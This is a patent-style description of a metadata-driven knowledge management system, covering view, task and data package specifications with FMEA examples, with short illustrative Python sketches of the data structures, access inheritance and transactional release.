[0015] The steps of a method or algorithm described in connection with the embodiments disclosed herein are embodied directly in hardware, firmware, in a software module executed by a processor, or in a combination thereof. A software module may reside in RAM memory, flash memory, ROM memory, EPROM memory, EEPROM memory, registers, hard disk, a removable disk, a CD-ROM, or any other form of storage medium known
in the art including a processor. An exemplary storage medium is coupled to the processor such that the processor can read information from, and write information to, the storage medium. In the alternative, the storage medium may be integral to the processor. The processor and the storage medium may reside in a user terminal. In the alternative, the processor and the storage medium may reside as discrete components in a user terminal.
[0016] In this document, relational terms such as first and second, and the like may be used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Numerical ordinals such as "first," "second," "third," etc. simply denote different singles of a plurality and do not imply any order or sequence unless specifically defined by the claim language. The sequence of the text in any of the claims does not imply that process steps must be performed in a temporal or logical order according to such sequence unless it is specifically defined by the language of the claim. The process steps may be interchanged in any order without departing from the scope of the invention as long as such an interchange does not contradict the claim language and is not logically nonsensical.
[0017] Furthermore, depending on the context, words such as "connect" or "coupled to" used in describing a relationship between different elements do not imply that a direct physical connection must be made between these elements. For example, two elements may be connected to each other physically, electronically, logically, or in any other manner and through one or more additional elements or components.
[0018] While at least one exemplary embodiment will be presented in the following detailed description of the invention, it should be appreciated that a vast number of variations exist. It should also be appreciated that the exemplary embodiment or exemplary embodiments are only examples, and are not intended to limit the scope, applicability, or configuration of the invention in any way. Rather, the foregoing detailed description will provide those skilled in the art with a convenient road map for implementing an exemplary embodiment of the invention. It being understood that various changes may be made in the function and arrangement of elements described in an exemplary embodiment without departing from the scope of the invention as set forth in the appended claims.
[0019] The subject matter provided herein discloses a knowledge management system ("KMS") featuring a mechanism through which a generic software application (the "Application") for managing complex knowledge bases can be adapted to address specific, narrow data domain access at much lower cost than other existing approaches. This mechanism is accomplished through the use of a generic set of declarative data structures (i.e., Metadata) and associated generic software along with a limited domain specific set of database tables to automatically produce HTML pages and associated scripts to allow users to navigate through a domain specific data set and to modify its content. The Metadata and generic software provide a mechanism to model a subset of a database that is visible to each user as they perform specific tasks to build the knowledge base and the specific steps for each task.
[0020] The specification(s) of the structures for entities, attributes and relationships for a data Model constitute the Metadata for that Model. A Model is a large group of data elements and data structure specifications that supports automatic data inference and decision making. The Model contains Entity Metadata, Attribute Metadata, and Relationship Metadata.
[0021] Relationship Metadata is the collection of relationship specifications that have been defined for the system. A relationship captures how entities are related to one another. Relationships can be thought of as verbs linking two or more nouns. Examples: an "aircraft has engine" relationship links an aircraft and its engine; an "aircraft has failure modes" relationship links an aircraft and all of the related failure modes; a "failure mode has symptoms" relationship links a failure mode to symptoms. A recursive relationship is one in which the same entity participates more than once in the relationship.
[0022] Entity Metadata is the collection of Entity Specs that have been defined for the system. An entity-type is a category. An entity, strictly speaking, is an instance of a given entity-type, and there are usually many instances of each entity-type. Because the term entity-type is somewhat cumbersome, most people tend to use the term entity as a synonym for it. Entity-types can be thought of as common nouns and entities can be thought of as proper nouns. Examples: a computer, an aircraft, a navy ship, an automobile, a tank, an engine, an employee, a song, a mathematical theorem.
[0023] Attribute Metadata defines the characteristics that Entity Metadata can have, where an attribute gives the details of a particular property for a given entity. An attribute of an entity or relationship is a particular property that describes the entity or relationship. The set of all possible values of an attribute is the attribute domain. An attribute can be thought of as an adjective describing a noun (e.g., a person can have a height). Height would be the Attribute Metadata; "Tim's height is 6 feet" is the value of the attribute. Attribute Metadata is the collection of Attribute Specs that have been defined in the system.
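By way of non-limiting illustration, the Entity, Attribute and Relationship Metadata described above may be sketched in Python; the class and field names below are illustrative assumptions and do not appear in the Metadata specifications themselves:

```python
from dataclasses import dataclass, field

@dataclass
class AttributeSpec:
    """An Attribute Spec: a named property with a domain of allowed values."""
    name: str
    attr_type: str  # e.g. "text", "number"

@dataclass
class EntitySpec:
    """An Entity Spec: a category (entity-type) together with its attributes."""
    name: str
    attributes: list = field(default_factory=list)

@dataclass
class RelationshipSpec:
    """A Relationship Spec: a verb linking two entity-types."""
    name: str
    parent: str  # parent entity-type name
    child: str   # child entity-type name

# The "aircraft has engine" example from the text:
aircraft = EntitySpec("Aircraft", [AttributeSpec("name", "text")])
engine = EntitySpec("Engine", [AttributeSpec("name", "text")])
has_engine = RelationshipSpec("AircraftHasEngine", "Aircraft", "Engine")
```

An entity (e.g., a specific aircraft tail number) would then be an instance conforming to one of these specifications.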
[0024] Metadata specifications are recorded in the database as Entity Specifications ("Entity Specs"), Attribute Specifications ("Attribute Specs"), Relationship Specifications ("Relationship Specs"), Task Specifications ("Task Specs"), View Specifications ("View Specs"), Report Specifications ("Report Specs") and other items that collectively define the functionality and behaviors of the Application.
[0025] Metadata is one of the two elements, along with Administrative Data, that constitute the Control Data for the Application. Since the entire DBMS is controlled by
this metadata, it includes much more detail than metadata encoded by a typical database application. The Metadata in a data model (a "Model") will have sufficient detail to produce the database schema for that Model along with additional specifications for workflow, access controls, and user help and support data for database editors. It is helpful to think of Metadata as a set of questions that the Model will eventually answer. It does not encode the answers to any of those questions but is used by the system to help the users to answer the questions.
[0026] Administrative data is data that is used to control access to the DBMS data, to display data and to control work assignments within the DBMS. Examples of Administrative Data include Users, User Groups and Data Packages. This data will typically be initialized by the development team and then managed by one or more users from the customer team.
[0027] A user group is a collection of users for which a common set of access controls can be defined. In this context, access controls pertain to the subset of data that the users can view, the subset of data that they can modify and the subset of functions that they can execute.
[0028] The data in the Model that controls the subset of the database that is visible to each user as they perform specific tasks is called a ViewSpec. The data in the Model that controls the specific steps for each task is called a TaskSpec.
[0029] In order to develop a set of ViewSpecs and TaskSpecs that are appropriate for each domain, the domain is first decomposed into a set of sub-models that reflect substantially self-contained elements of the overall model. For example, in a domain for a medical information system, typical sub-models would focus on "principles of chemistry", "principles of biology", "human physiology", "the respiratory system", "the digestive system", etc. Sub-models may also contain lower level sub-models. For example, the model for each of the systems of the body (e.g. respiratory, digestive, immune, etc.) may contain sub-models that describe "normal functions", "organs", "interactions", "diseases", "treatment" and "prevention." It should be recognized that there will typically be many sub-models within a domain that are structurally equivalent. For example, all of the sub-models for "diseases" (one for each body system) capture data that is structurally equivalent. This is so because those models all contain descriptions of changes to the composition of the organs, tissues or processes that result in loss of function and the symptoms associated with these changes.
[0030] The subject matter herein uses a data structure called a "Data Package" to represent the sub-models and a data structure called a "Data Package Specification" 94 to represent the common structures that are used by one or more Data Packages.
[0031] Data Packages are also referred to as "Concepts" which is nomenclature that is probably closer to their function description. A Data Package/Concept is used to define a subset of the database data that would be maintained by a single group or updated in a single task. For example an automobile may contain as many as 50 systems for which the structure of the Model (e.g. the set of entities, attributes and relationships to be specified) is equivalent but the Application Data for each system will be substantially different. In this example, each of the 50 systems would be a separate Data Package for which a separate group of users would be responsible for importing, editing and maintaining the Application Data for one or more of the systems. The specification of the Data Package Hierarchy 100 (See, FIG. 3) for a Model is a critical aspect of developing a new application and will usually reflect application-specific structures that correspond to the assembly of the monitored asset(s) and the organization of the producer of the asset and/or the maintainer of the asset. A Data Package Hierarchy 100 is the relationship organization between data packages that allows data access controls to be shared. This hierarchy 100 is organized as a tree where the tree nodes that contain additional subordinate nodes share their access control permissions with all of their subordinate nodes. For example, if a user 99 has access to one data package, they automatically have equivalent access to all data packages subordinate to that one data package.
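The access-inheritance behavior of the Data Package Hierarchy 100 described above, in which a node's access control permissions are shared with all of its subordinate nodes, may be sketched as a simple tree walk. The class and function names below are illustrative assumptions:

```python
class DataPackageNode:
    """One node in a Data Package Hierarchy, organized as a tree."""
    def __init__(self, name, children=None):
        self.name = name
        self.children = children or []

def accessible_packages(root, granted):
    """Expand a set of directly granted package names to include every
    subordinate package, per the inheritance rule of the hierarchy."""
    result = set()
    def walk(node, inherited):
        inherited = inherited or node.name in granted
        if inherited:
            result.add(node.name)
        for child in node.children:
            walk(child, inherited)
    walk(root, False)
    return result

# A user granted "Propulsion" automatically gains its sub-packages:
root = DataPackageNode("Vehicle", [
    DataPackageNode("Propulsion", [
        DataPackageNode("Engine"),
        DataPackageNode("Transmission"),
    ]),
    DataPackageNode("Braking"),
])
```

Here, `accessible_packages(root, {"Propulsion"})` yields the Propulsion package plus its Engine and Transmission sub-packages, while leaving Braking inaccessible.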
[0032] Application Data is the specific set of instances for the entities, the values for their attributes and their interrelationships constitutes the Application Data for a Model. Non-limiting examples of Application Data in a maintenance environment are the specific set of functions performed by an asset, the set of failure modes for that asset, the occurrence rates of those failure modes and the set of relationships between failure modes, functions, symptoms and corrective actions. Application data may be thought of as the full set of answers to the questions asked by the Metadata of the Model.
[0033] Application Data for a Model is separated between Production Data and Change Package Data. All editing of Application Data occurs against constructs called "Change Packages." A Change Package includes a block of updates to the content of the Model which will be applied to the production Model as a single transaction which is called "release to production." Production Data is the result of "Change Package Data" for which the editing and auditing process is complete, has been reviewed for consistency and has been "Released" into the production data set.
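The "release to production" behavior, in which a Change Package's block of updates is applied to the production Model as a single transaction, may be sketched using the transactional semantics of Python's sqlite3 module. The table and column names here are invented for illustration, and the sketch assumes the table and column identifiers originate from trusted metadata rather than user input:

```python
import sqlite3

def release_to_production(conn, change_package):
    """Apply every update in the change package as one transaction:
    either all rows are released, or none are."""
    # The sqlite3 connection context manager commits on success
    # and rolls back if any statement in the block raises.
    with conn:
        for table, row_id, column, value in change_package:
            conn.execute(
                f"UPDATE {table} SET {column} = ? WHERE id = ?",
                (value, row_id),
            )

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE failure_modes (id INTEGER PRIMARY KEY, rate REAL)")
conn.execute("INSERT INTO failure_modes VALUES (1, 0.0), (2, 0.0)")

# A change package: a block of updates released as a unit.
release_to_production(conn, [
    ("failure_modes", 1, "rate", 0.01),
    ("failure_modes", 2, "rate", 0.02),
])
```

If any single update fails, the production data is left unchanged, mirroring the single-transaction semantics of a Release To Production.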
[0034] In the definition of the Data Packages for an application, a database developer will encounter many sets of Data Packages that are structurally similar. An example would be that all of the sub-Models for "diseases" (one for each body system) capture data that is structurally equivalent (e.g., they all contain descriptions of changes to the composition of the organs, tissues or processes that result in loss of function and the symptoms associated with these changes). The data item for each set of Data Packages that share a common structure is called a Data Package Type.
Each Data Package Type is associated with one or more Viewspecs that reflect the user activities associated with creation, import, audit and finalization of the data for portions of the Model within the domain. These Viewspecs are used by the user interface to present the limited portion of the Model that is relevant to the user in performing a specific task in the overall knowledge base development process.
One or more Task Specifications ("TaskSpecs") are associated with each "ViewSpec" to control the sequence of steps that is required for the user in performing a specific task in manipulating the data in the database. A Task Spec is the portion of the Metadata of a Work Package Specification that controls the sequence of steps that must be performed to provide the Application Data for each Work Package that is governed by the Work Package Specification.
A Work Package Specification is a portion of the Metadata that specifies the structure and control data that will be used to create one or more Work Packages. For example, a Work Package Specification would be created to specify the structure and control data for the Work Packages that facilitates the Modeling for each of the 50 systems discussed earlier. It is important to recognize that the purpose of a Work Package Specification is to allow application designers and administrators to create templates for the creation of Work Packages by end-users who know what they want to do, but need help in the required sequence of steps to accomplish that objective. It is also important to know that part of a Work Package Specification is the specification of behaviors that are to be performed when a new Work Package instance governed by this Work Package Specification is created or released to production.
The combination of Data Packages, Data Package Specifications 94, Task Specifications 13 ("TaskSpecs") and View Specifications 11 ("ViewSpecs") (See, FIG. 2) is used by the generic software to create the set of graphical user interface 80 ("GUI") screens that are presented to the user based on the set of tasks for which the user is responsible. This set of GUIs provides a complete set of interfaces needed by all users to create and modify their portion of the knowledge database (See, e.g., FIG. 6).
FIG. 1 is a block diagram of a simplified computer system commonly used to store and use a content data database 10 containing application data and a DBMS 20. The database 10 may reside in any suitable storage media known in the art or that may be developed in the future. Non-limiting examples of computing devices may be desktop computers, laptop computers, cell phones, projectors and handheld personal computing devices of all types.
A database user may access the database 10 by utilizing a plurality of graphical user interfaces 80 that are displayed on a display device 90. The display device may be any display device known in the art or that may be developed in the future. Non-limiting examples of a display device may be a cathode ray tube display, a plasma display, an LCD display, and a hologram.
FIG. 2 is a chart laying out an overview of the data schema arrangements for generating View Specifications by the KMS. FIG. 3 is an overview of the KMS that may access the database 10 using a set of tools that are user friendly and that allow the conversion of unstructured and disparate data sources into an integrated data set that supports data driven inferences desired by an end user.
A specific user 99, as shown at the bottom left, has read access (shown as a shaded box) and write access (shown as a white box) to a small portion of the database 10 at a given time. These portions of the database 10 are known as Data Packages 150, which are systems, sub-systems and elements that are related to each other by topic in a hierarchical manner. The portion of the database 10 to which user 99 has access is specified by a set of groups to which the user belongs and by a currently active work package. It is important to recognize that the portion of the database accessible to the user based on the work package limitations may be much smaller than the portion of the database accessible to the user 99 based on their group association.
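The observation above, that the access granted by the active work package may be much smaller than the access granted by group membership, may be sketched as a set intersection; the function and variable names below are illustrative assumptions:

```python
def effective_access(group_packages, work_package_scope):
    """A user's effective data access while a work package is active:
    the intersection of group-granted packages and the scope of the
    currently active work package."""
    return set(group_packages) & set(work_package_scope)

# The user's groups grant four packages, but the active work package
# confines the user to one of them:
group_access = {"Fuel Management", "Propulsion", "Steering", "Braking"}
active_work_package_scope = {"Propulsion"}
current = effective_access(group_access, active_work_package_scope)
```

Here `current` contains only `"Propulsion"`: the work package narrows the group-level grant for the duration of the task.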
A "group" or "user group" is administrative data that identifies users 99 associated with one or more "Data Packages" 150 for which they will have read and or right access to the data in the database 10 that is associated with those "Data Packages" (See, FIG. 5 for an exemplary conceptual rendition of a Data Package). For example, an administrator may create a user group called "System-1 Developers" and specify that this group has "Write Access" to content data in the "System-1" Data Package. The user group data may be used by the KMS for access control and workflow control for a Data Package (See, FIG. 5 for an exemplary rendition of a Data Package).
"Content data" is stored in physical data tables in database 10. A table name is the name assigned to a physical table. It is how a DBMS or application accesses the content of the physical table.
Content data encodes entities, values for entity attributes, and relationships that are stored in data structures that support internal DBMS functionality rather than in structures that encode data terminology that is familiar to the end users. For this reason, much of the functionality within the KMS 25 is focused on converting the content data from its physical form, which facilitates DBMS functionality, into a form that is manageable in size and is understandable by the end-users authorized for read and write access. This is done by tailoring the content data to the confines of a specific work package. Non-limiting examples of content in the context of electro-mechanical asset maintenance would be the specific set of functions performed by an asset, the set of failure modes for that asset, the occurrence rates of those failure modes and the set of relationships between failure modes, functions, symptoms and corrective actions. One may consider content data as the full set of data to answer the questions asked by the metadata 14 of the content data in the database 10.
Much of the functionality of the KMS 25 relies upon the careful factoring of the content data in the database 10 into a number of "type specifications" that are related to each other through inheritance from other type specifications and the composition of those other type specifications. Using a hypothetical database application for American History for example, George Washington's military career could be factored into the French and Indian war period and the Revolutionary War period, further factored into different engagements that occurred during those periods and yet further factored into other sub-type specifications related to those engagements.
A significant difference between the instant subject matter and a traditional database application is that in regard to the current subject matter, a large percentage of the type hierarchy (i.e., data relationships/factoring) is not known at design time. Instead, this portion of the type hierarchy is created by end users as they record/input the content data into database 10. It should be emphasized that the type specifications for the system metadata 14 are developed by a system designer, while type specifications for the content data in database 10 itself are developed by a user 99 that may have no database development skills.
Referring again to FIG. 2, a "work package" 92 is administrative data which comprises a "specialized change package." A "specialized change package" facilitates the development of a specific portion of the database content. A work package 92 is associated with a specific Data Package 150, view spec 11, a report spec 18, and task spec 13. For example, a work package 92 may be created to enter and audit data from a failure mode and failure effects analysis as a part of the database 10 content development for a particular complex system. It is useful to think of a work package 92 as a container of data and an associated wizard that assists the user in populating the appropriate data for the container.
A "work package specification" 201 is a portion of the metadata 14 that specifies the structure and control data that will be used to create a work packages 92. For example, a work package specification 201 may be created to specify the structure and control data for the work package 92 that facilitates the modeling of a subsystem of an electro-mechanical system. The purpose of a work package specification 201 is to allow application designers and administrators to create templates for the creation of work packages 92 by users 99 who know what they want to accomplish with their data, but need help in the required sequence of steps to accomplish that objective. Part of a work package specification 201 is the specification of behaviors that are to be performed when a new work package 92 instance governed by its work package specification 201 is created.
Work packages 92 may be sequenced together. Since a Work Package Specification 201 specifies behaviors that are to be performed when a new Work Package instance governed by that Work Package Specification is created, the specified behaviors can be to create new, derived Work Packages. A sequence of Work Packages arising from an initial event may be considered as a network of work packages. An example of a task network is a sequence of Work Packages that arise from the receipt of a bill of lading.
A "change package" includes a block of data updates to the content of the database that will be applied to the database as a single transaction which is called a "Release To Production". "Change package data" is data for which an editing and auditing process is complete, has been reviewed for consistency and has been released to production.
The database 10 also includes metadata 14, which is data about the data in the database. Metadata 14 comprises structure specifications for the entities, attributes and relationships associated with the data. Metadata specifications are recorded in the database as "entity specs" 15, "attribute specs" 16, "relationship specs" 17, "task specs" 13, "view specs" 11, "schema specs" 12, "report specs" 18 and other items that collectively define the functionality and behaviors of the KMS 25. Since the entire KMS 25 is controlled by the metadata specifications 14, they include much more detail than metadata encoded by a typical database application. The metadata specifications 14 in KMS 25 have sufficient detail to produce the database schema along with additional specifications for workflow, access controls, user help and support data for DBMS editors such as a cross tab editor 45. It is helpful to think of a metadata specification as a set of questions that the database 10 will eventually answer. The metadata specifications 14 do not encode the answers to any of those questions but are used by the KMS 25 to help the users 99 to answer the questions.
An "entity" is a specific physical data table structure grouping a set of data elements that have a repeatable set of properties. Non-limiting examples of entities for a maintenance database may include functions, failure modes, symptoms and repairs.
An entity specification (or "entity spec") is a definition of a given entity. An entity spec lists the attributes and relationships that apply to the entity along with other properties of the entity spec. Non-limiting examples of data in an entity spec include Long Name, Description, primary key, and, for maintenance related KMS systems, "Failure Mode Affects Function." A primary key is a unique identifier in an entity spec that identifies a unique entity. The primary key is utilized to create "relationships."
An "attribute" is the subset of the properties for each entity whose values are basic data types such as text, numbers or binary objects. Non-limiting examples of attributes in a maintenance database may include the names of the entities, the failure rate of the failure modes and the instructional text for the corrective actions.
An "attribute specification (or "attribute spec") is the definition of a given attribute. An attribute spec lists the properties for an attribute. Non-limiting examples include an attribute type and a size of the attribute in bits. A human readable version of the attribute specification is a "display name." The display name includes spaces and punctuation where applicable. An "attribute type" is a data type, such as a number, string, references, Boolean logic, etc. An attribute constraint is a data field constraint. Non-limiting examples include a mandatory constraint, a minimum value, a max value, etc.
Attributes are changed using a specific attribute editor, of which there are several types. Attribute editors may include pick list, multi select list, text (no formatting), long text (with formatting) and a reference item selector.
A "relationship" is a subset of properties for each entity whose values are pointers to other entities. Non-limiting examples of relationships that may be used in a maintenance database include set of symptoms produced by each failure mode and the corrective action for each failure mode. Most relationships may be edited. In some cases, many-to-one relationships are presented to the user along with attributes in the editor from the "many" side since the relationship can only contain a single value from this side.
A "relationship specification" (or "relationship spec") is the definition of a given "relationship". A relationship spec lists the properties for the relationship along with its associations to entity specifications, defined above. Optionally, relationship specs themselves can also have attributes which are specific to the relationship connecting two entities. Non-limiting properties include parent entity specifications, child entity specifications and attribute specifications.
The forward name is the name of the "relationship" displayed to a user when editing the relationship from the source entity to the destination entity. The "forward name" is similar to the name of the "relationship spec," except that it has spaces and other content for human readability. For example the relationship name FailureModeCausesSymptom would be changed to read "Failure Mode Causes Symptom" by a human.
The reverse name is the name of the relationship displayed to the user 99 when editing the relationship from the destination entity to the source entity. For example the relationship name FailureModeCausesSymptom would be changed to read "Symptom caused by Failure Mode" by a human.
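Although the text describes the conversion to a human-readable forward name as performed by a human, such a conversion could also be sketched as a mechanical CamelCase split; note that the reverse name (e.g., "Symptom caused by Failure Mode") is worded differently and would have to be stored rather than derived:

```python
import re

def forward_name(spec_name):
    """Insert a space before each interior capital letter, so that
    'FailureModeCausesSymptom' reads 'Failure Mode Causes Symptom'."""
    return re.sub(r"(?<!^)(?=[A-Z])", " ", spec_name)

print(forward_name("FailureModeCausesSymptom"))  # Failure Mode Causes Symptom
```

A real system would likely still let an editor override the generated name, since not every relationship spec name splits cleanly.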
The Schema Specifications 12 ("Schema Specs") and View Specifications 11 are used by the KMS 25 to convert the data (as stored in relational database tables) into a logical view of a Data Package Hierarchy 100 which shows entities and relationships using terminology and structures that are familiar to the end user rather than the structure encoded within the KMS 25.
A "schema specification" (or "Schema Spec") defines a set of logical entities within the data model. While an entity spec (defined above) defines a specific physical table structure, a schema spec defines a logical compartmentalization of data from that table. The schema spec allows the KMS 25 to display items representing those logical entities separately. The logical entities will contain a subset of the "attributes" and "relationships" that are valid for an entity spec.
A "view specification or "view spec" is user definable metadata 14 that specifies the subset of Application or Content Data that is viewable to user from the perspective of a Data Package, Work Package or report that allows a user 99 to select attributes and data definitions, assign them to user defined hierarchical levels and then link the data definitions such that the a second data definition operates as a sub-query for a first data definition.
A Viewspec can be used by many different Data Package Specifications 94, Work Package specifications 201 and Report specifications 18. An example of a Viewspec is the set of entities, attributes and relationships that can be used to navigate through the application data 10' concerning a system and edit its contents.
Exemplary application data in database 10 may be Failure Mode and Effects Analysis (FMEA) data for a particular system. The complete data for the FMEA can be viewed using one or more Viewspecs. Entities may be System, LRU, Failure Mode, Symptom, and Function. The attributes may be system name, LRU name, failure mode name, failure mode rate, symptom name, symptom false alarm rate, function name and function criticality. The relationships may be "System Contains LRUs," "LRU contains Failure Modes," "Failure Mode causes Symptom," and "Failure Mode effects function."
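The FMEA metadata listed above can be encoded, for illustration, as plain Python structures; the real KMS stores these definitions in relational tables, so this is only a readable sketch of the same content.

```python
# Illustrative encoding of the exemplary FMEA metadata: entities, their
# attributes, and the relationships between entities, exactly as listed
# in the text above.
fmea_metadata = {
    "entities": ["System", "LRU", "Failure Mode", "Symptom", "Function"],
    "attributes": {
        "System": ["system name"],
        "LRU": ["LRU name"],
        "Failure Mode": ["failure mode name", "failure mode rate"],
        "Symptom": ["symptom name", "symptom false alarm rate"],
        "Function": ["function name", "function criticality"],
    },
    "relationships": [
        ("System", "Contains", "LRU"),
        ("LRU", "contains", "Failure Mode"),
        ("Failure Mode", "causes", "Symptom"),
        ("Failure Mode", "effects", "Function"),
    ],
}

# Simple consistency check: every relationship endpoint must be a known entity.
for src, _verb, dst in fmea_metadata["relationships"]:
    assert src in fmea_metadata["entities"]
    assert dst in fmea_metadata["entities"]
print("metadata consistent")
```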
A Data Package Specification 94 is a definition of a type of a data package that grants the access controls for that type. The Data Package Specification 94 allows multiple different data packages to be defined with the same set of controls easily. A specific example of a Data Package Specification 94 could be the specific FMEA data for each system on a vehicle (i.e., Fuel Management, Power generation, Propulsion, Steering, Braking, etc.). Each Data Package includes additional data to specify the set of users that can modify the data in that particular data package. The Data Package Specification 94 specifies the data structure to contain the data for a specific FMEA and to map it to the physical data structures in the data 10'.
A Report Specification comprises metadata that defines the layout of the data from the specific data subset domain 151 as rendered to the display device or onto paper. A single viewspec can have multiple report specifications that give different layouts for rendering the viewspec content to the user.
[0069] An Example of a Work Package would be the task assigned to a specific user to create the FMEA data for a single system. The Work Package specification 201 would include the Viewspec and a Write Data Package List that would be assigned to a user 99 to create the FMEA data for any system.
[0070] In other words, a view spec 11 specifies a subset of content data of data base 10 that is viewable to particular user that is associated with a Data Package, Work Package or report. A view spec 11 also performs terminology mappings (aka "Aliases") that convert DBMS standard terms to terms that are familiar to a given user 99. For example, the term "module" may be mapped to the term "LRU" for one user and "ECU" to another user. The mapping is accomplished using generic editors. A non-limiting list of generic editors includes grid editors, entity editors, crosstab editors, relationship editors and graphical Modeling tools.
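The terminology mapping ("aliases") described above can be sketched as a small lookup keyed by user group. The group names here are hypothetical; the fall-through to the DBMS-standard term when no alias exists is an assumption about reasonable behavior, not a statement of the KMS's actual implementation.

```python
# Minimal sketch of per-user-group terminology mapping: the same
# underlying term ("module") is rendered differently for different
# user groups, per the example in the text.
ALIASES = {
    "avionics_group": {"module": "LRU"},
    "automotive_group": {"module": "ECU"},
}

def display_term(term: str, user_group: str) -> str:
    """Return the user-facing alias for a DBMS-standard term,
    falling back to the term itself when no mapping exists."""
    return ALIASES.get(user_group, {}).get(term, term)

print(display_term("module", "avionics_group"))    # LRU
print(display_term("module", "automotive_group"))  # ECU
print(display_term("module", "other_group"))       # module
```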
[0071] A data definition may be described as a query with filters that combines one or more entities and selected attributes and may be identified with a specific name, such as "symptoms" or "symptom causes failure modes."
[0072] A "task specification" or "task spec" is that portion of the metadata 14 associated with a Work package specification 201 that controls the sequence of steps that must be performed to locate and provide the content data for each work package 92 that is governed by the work package specification.
[0073] FIG. 4 describes an exemplary sequence of steps 200 to implement the inventive concepts described herein. At process 210 the Metadata 14 for the domain of data 10' of concern is identified. When the one or more Viewspecs are provided for an existing data source 10', the basic metadata 14 for the domain is created or obtained. This metadata 14 comprises the definitions of all entity types 15, attribute types for the data that is to be displayed, relationship types and primary keys. Metadata 14 may be created using any suitable commercial tool for creating Entity Relationship Models for a relational database.
[0074] Once the Metadata 14 has been identified, it needs to be loaded into table structures that are used by the system at process 220. This can be an automated import or a manual entry using editors. Such tables that are characteristic of the subject matter described herein are the Entity Specification, which comprises the Table Name 95, the Primary Key, and the Long Name; the Relationship Specification, which comprises the Source Entity Type 15, Destination Entity Type 15, Forward Name, Reverse Name and Cardinality Rules; and the Attribute Specification, which comprises the Entity Name, the Attribute Name, the Display Name, the Attribute Type, the Attribute Editor and Constraints.
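The three specification tables just listed could be sketched as relational tables like the following. SQLite is used purely for illustration; the column names follow the text, but the schema itself (types, keys) is an assumption.

```python
# Sketch of the metadata tables described in the text: entity,
# relationship and attribute specifications, loaded into an in-memory
# SQLite database for illustration.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE entity_spec (
    table_name       TEXT PRIMARY KEY,
    primary_key      TEXT NOT NULL,
    long_name        TEXT NOT NULL
);
CREATE TABLE relationship_spec (
    source_entity    TEXT NOT NULL,
    dest_entity      TEXT NOT NULL,
    forward_name     TEXT NOT NULL,
    reverse_name     TEXT NOT NULL,
    cardinality      TEXT NOT NULL
);
CREATE TABLE attribute_spec (
    entity_name      TEXT NOT NULL,
    attribute_name   TEXT NOT NULL,
    display_name     TEXT NOT NULL,
    attribute_type   TEXT NOT NULL,
    attribute_editor TEXT,
    constraints      TEXT
);
""")

# Manual entry of one entity specification, as process 220 allows.
conn.execute("INSERT INTO entity_spec VALUES (?, ?, ?)",
             ("FAILURE_MODE", "fm_id", "Failure Mode"))
row = conn.execute("SELECT long_name FROM entity_spec").fetchone()
print(row[0])  # Failure Mode
```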
[0075] The next step is to partition the application data into Data Package Types at process 230 that are associated with recurring patterns of import, audit and authoring in the application data. For example, a FMEA application would have a Data Package Type to contain a Bill of Materials (BOM) for a vehicle and another Data Package Type to contain the Failure Modes and Effects for each assembly identified in the BOM.
[0076] The Application data is partitioned into Data Packages 150 at process 240, where each Data Package is associated with a single Data Package Type. For example, a FMEA application would have one Data Package 150 to contain the BOM hierarchy for a vehicle and a large number of Data Packages 150 to contain each of the Failures and effects of each assembly identified in the BOM. It should be noted at this point that data base developers may iterate between processes 230 and 240 until all of the data that the knowledge base will contain is mapped to a Data Package 150 and all Data Packages 150 are associated with a single Data Package Type 201.
[0077] At process 250, User Groups 91 are associated with the read and write access to each Data Package 150. It should be pointed out for clarity that a Data Package Specification 94 may be thought of as identifying Data Packages 150 that exist at the same horizontal slice of the Data Package hierarchy 100, while User Groups 91 identify a grouping of Data Packages that exist in the same vertical slice of the Data Package hierarchy 100.
[0078] At Process 260, the ViewSpecs 11 that will be associated with each Data Package Type 94 will be specified. A database developer creates a separate Viewspec 11 for each subset of Data Package Type 94 that would be presented to the user 99 to support specific editing and auditing tasks. In developing an exemplary FMEA for an assembly, the user 99 may want to view the data from the perspective of Failure Modes and the effects that they produce. At another point in the analysis, the user 99 may want to view all of the effects and then see the Failure Modes that produce those effects. These two ways of viewing the same data are specified through two separate ViewSpecs 11 that would be associated with the Data Package.
[0079] An element of a Viewspec 11 is a Data Graph, which specifies a set of Entities and Relationships that should be included in the Viewspec. In a FMEA example, where the purpose of the data view output is to display Failure Modes and Effects, the Data Graph would contain the following exemplary relationship structure:
- **Entity Type: Assembly XYZ**
- **Relationship Level 1**: Assembly XYZ contains Assembly XYZ1
- **Relationship Level 2**: Failure Mode causes Effects
[0080] This exemplary Data Graph instructs display rendering software to expect one or more Assembly
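As a hedged sketch of how rendering software might interpret a Data Graph like the one above, the graph can be walked level by level to emit a nested display outline. The entity and relationship names mirror the example; the data structure and function are assumptions for illustration only.

```python
# Illustrative Data Graph: a root entity type plus a list of relationship
# levels, mirroring the exemplary structure in the text.
DATA_GRAPH = {
    "root": "Assembly XYZ",
    "levels": [
        ("Assembly XYZ", "contains", "Assembly XYZ1"),
        ("Failure Mode", "causes", "Effects"),
    ],
}

def render_outline(graph: dict) -> list:
    """Produce an indented outline, one line per relationship level."""
    lines = [graph["root"]]
    for depth, (src, verb, dst) in enumerate(graph["levels"], start=1):
        lines.append("  " * depth + "%s %s %s" % (src, verb, dst))
    return lines

for line in render_outline(DATA_GRAPH):
    print(line)
```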
At process 270, the Viewspecs 11 are attached to task specifications. Once the Viewspecs 11, Data Packages 150, Data Package Specifications 94 and User Groups 91 have been defined, a developer can create Task Specifications 13 that define how a specific User Group 91 will edit the data in a Data Package Type using a ViewSpec 11 to control the data that they will see while performing the task. A Task Specification 13 also identifies the specific steps associated with the overall task and the consistency checks that can be performed when the task is complete. Consistency Checks ensure that the data in the Data Package meets the quality constraints defined for the Entity Specification 15, Attribute Specification 16 and Relationship Specification 17 defined in the Data Package 150.
At process 280, the Viewspecs 11 are also attached to Report Specifications ("Reportspecs"). A Viewspec includes a Data Graph, and a Viewspec 11 is a convenient basis for generating reports, which will typically navigate the same Entity Types 15 and Relationship Specs 17 as are already being navigated by the Viewspec 11. The Viewspec 11 becomes the basis for a Report Spec 18, to which page layout details are then added.
At Process 290 the DBMS application 20, including the Viewspecs, Taskspecs and Reportspecs, is released for use by user 99 at Process 295. As user 99 interacts with the KMS 25, they create Work Packages 201 that are used to guide the editing of data in a Data Package 150 based on one of the Taskspecs 13 that are applicable to the Data Package Type 15 associated with the Data Package 150.
At process 295, user 99 creates reports based on the Report Specifications created and attached to the Viewspec 11 in process 280, which are used to document the contents of the application data in the database 10. The reports generated are based on the Viewspec 11 and one or more data entry points supplied by the user 99 when the report is requested.
